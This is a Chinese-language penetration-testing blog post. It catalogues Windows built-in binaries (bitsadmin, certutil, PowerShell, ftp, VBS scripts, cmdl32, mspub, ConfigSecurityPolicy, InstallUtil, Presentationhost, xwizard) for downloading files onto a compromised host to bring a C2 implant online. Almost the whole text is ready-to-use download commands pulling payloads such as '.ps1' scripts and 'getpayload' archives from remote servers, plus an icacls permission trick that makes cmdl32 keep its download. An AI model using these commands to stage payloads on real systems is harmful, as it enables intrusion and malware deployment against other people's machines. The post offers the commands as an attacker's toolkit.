前言

我们在渗透过程中，当获取到一个shell能够执行命令的同时，想要上线c2，就要先将文件传输到目标，并用到一些命令行中的下载命令如BITSAdmin、Certutil、 powershell、HH等。

本文将列举一部分文件落地的下载方式。无文件落地不在本篇范围内。

下载命令

Bitsadmin

BITSAdmin 是一个命令行工具，可用于创建下载或上传作业并监视作业的进度。

文件路径：
C:\Windos\System32\Bitsadmin.exe

支持系统：

WindowsServer 2022、WindowsServer 2019、Windows Server 2016、Windows Server 2012、Windows 10、Windows7

用法：

bitsadmin /transfer myDownLoadJob /download /priority normal "http://url/a.ps1" "c:\b.ps1"
bitsadmin /rawreturn /transfer getfile http://url/s.zip c:\s1.zip
bitsadmin /rawreturn /transfer getpayload http://url/c.zip c:\c1.zip

Certutil

certutil是Windows自带的证书管理工具，具有下载文件，校验文件MD5、SHA1、SHA256，文件base64编码等功能。

文件路径：

C:\Windows\System32\Certutil.exe

支持系统： windows

用法：

#保存文件并指定新文件名
certutil.exe -urlcache -split -f http://url/1.txt file.jsp
注：使用下载，会在工具缓存目录产生缓存文件
#缓存路径
C:\Users\xq\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
#查看缓存项目：
certutil.exe -urlcache *

powershell

自win7/win 2008开始，win系统增加了powershell工具。
PowerShell是一种命令行外壳程序和脚本环境

文件路径：
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

支持系统： win7/win2008 =<

用法：

powershell (new-objectNet.WebClient).DownloadFile('http://url/aa.ps1','c:\bb.ps1')

FTP

将文件传输到运行文件传输协议的计算机 (ftp) 服务器服务。可以通过处理 ASCII 文本文件以交互方式或在批处理模式下使用此命令。

文件路径：

支持系统： windows

用法：

cmd无交互

echo open 192.168.225.79>ftp.txt
echo user>>ftp.txt
echo pass>>ftp.txt
echo get /sd.exe>>ftp.txt
echo quit>>ftp.txt
@ftp -s:ftp.txtVBS脚本

cscript

在windows中还支持一种VBS后缀脚本语言，可看作VB语言的简化版
文件路径：
C:\Windows\System32

支持系统： windows

用法：
cmd无交互

echo Set Post = CreateObject("Msxml2.XMLHTTP") >> download.vbs
echo Set Shell = CreateObject("Wscript.Shell") >> download.vbs
echo Post.Open "GET","http://192.168.203.140/a.ps1",0 >> download.vbs
echo Post.Send() >>download.vbs
echo Set aGet = CreateObject("ADODB.Stream") >> download.vbs
echo aGet.Mode = 3 >> download.vbs
echo aGet.Type = 1 >> download.vbs
echo aGet.Open() >> download.vbs
echo aGet.Write(Post.responseBody) >> download.vbs
echo aGet.SaveToFile "D:/a.ps1",2 >> download.vbs
#执行
cscript downfile.vbs

省略······
除了上述这些经典的方法，我还总结了一些tips

cmdl32

Microsoft 连接管理器自动下载。

文件路径：

• C:\Windows\System32\cmdl32.exe
  
• C:\Windows\SysWOW64\cmdl32.exe
  

支持系统：

WindowsVista、Windows7、Windows8、Windows8.1、Windows10、Windows11

从配置文件中指定的网址下载文件。下载的文件将位于名称 VPNXXXX.tmp 下的 %TMP% 中

用法：
创建文本 1.txt

[Connection Manager]
CMSFile=1.txt
ServiceName=WindowsUpdate
TunnelFile=1.txt
[Settings]
UpdateUrl=http://192.168.3.114:81/test.txt

#赋予权限，设置缓存位置，并下载
icacls %cd% /deny %Username%:(OI)(CI)(DE,DC)
set tmp=%cd%
cmdl32 /vpn /lan %cd%\1.txt
#删除权限，否则无法操作文件
icacls %cd% /remove:d %username%

Mspub.exe

mspub.exe是属于Microsoft Publisher产品的主要流程，允许制作商业和个人时事通讯和出版物。包含在office套件中。
文件路径：
C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe
C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe
C:\Program Files\Microsoft Office\Office16\MSPUB.exe
C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe
C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe
C:\Program Files\Microsoft Office\Office15\MSPUB.exe
C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe
C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe
C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe
C:\Program Files\Microsoft Office\Office14\MSPUB.exe

支持系统：

Windows 10、Windows 11

该命令将下载远程文件并放入缓存文件夹

%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE

用法：

该方法依赖offce套件，执行后将会打开publisher应用窗口。

从远程服务器下载负载

mspub.exe https://example.com/aaaa

ConfigSecurityPolicy.exe

Defender文件，用于管理Windows Defender中的设置。

文件路径：

C:\Program Files\Windows Defender\ConfigSecurityPolicy.exe
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\ConfigSecurityPolicy.exe

支持系统： Windows 10、Windows 11

用法：

该命令将下载远程文件并放入缓存文件夹 win10:

%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE

ConfigSecurityPolicy.exe https://example.com/aaaa

Installutil

是一个命令行实用程序，允许通过在指定程序集中执行安装程序组件来安装和卸载。此工具与System.Configuration.Install命名空间中的类一起工作。
文件路径：

C:\Windows\Microsoft.NET\Framework\v\InstallUtil.exe 
C:\Windows\Microsoft.NET\Framework64\v\InstallUtil.exe

支持系统：

Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

用法：

该命令将下载远程文件并放入缓存文件夹

win10:

%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE）

win7:

%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files

InstallUtil.exe https://www.baidu.com/img/flexible/logo/pc/result.png

Presentationhost.exe

它使 WPF 应用程序可承载于兼容的浏览器,用于运行XAML浏览器应用程序 .
文件路径：

• C:\Windows\System32\Presentationhost.exe
  
• C:\Windows\SysWOW64\Presentationhost.exe
  

支持系统：
Windows vista、Windows 7、Windows 8、Windows 8.1、Windows 10、Windows 11

用法：

该方法是调用IE浏览器下载，会弹出ie窗口及文件保存窗口，此时无需保存，文件已存在缓存目录内

该命令将下载远程文件并放入缓存文件夹win10:

%LOCALAPPDATA%\Microsoft\Windows\INetCache\IE

win7:

%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files

Presentationhost.exe https://www.baidu.com/img/flexible/logo/pc/result.png

Xwizard.exe

执行已添加到注册表的自定义类或使用Xwizard.exe下载

文件路径：

• C:\Windows\System32\xwizard.exe
  
• C:\Windows\SysWOW64\xwizard.exe
  

支持系统：

Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10, Windows 11

用法：

使用该方法时，会弹出错误警告窗口。但文件已经存入ie缓存目录

Xwizard.exe使用RemoteApp和桌面连接向导下载文件，并将其保存到

%LocalAppData%\Microsoft\Windows\INetCache\<8_RANDOM_ALNUM_CHARS>/<FILENAME>

或

%LOCALAPPDATA%\Microsoft\Windows\Temporary Internet Files

xwizard RunWizard {7940acf8-60ba-4213-a7c3-f3b400ee266d} /z 
https://www.baidu.com/img/flexible/logo/pc/result.png

其他

这里只总结了一小部分方法，除此之外还有很多能够用来远程下载文件的系统应用。

欢迎一起交流想法，

下期文章你想看什么？留言告诉我们！！